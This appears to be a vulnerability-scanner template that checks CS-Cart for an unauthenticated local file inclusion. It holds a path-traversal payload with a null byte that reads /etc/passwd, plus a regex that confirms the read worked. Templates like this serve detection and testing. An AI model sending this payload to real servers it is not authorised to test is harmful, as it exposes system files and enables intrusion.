id: cs-cart-unauthenticated-lfi info: name: CS-Cart unauthenticated LFI author: 0x_Akoko severity: high description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content. reference: - https://cxsecurity.com/issue/WLB-2020100100 tags: cscart,lfi requests: - method: GET path: - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200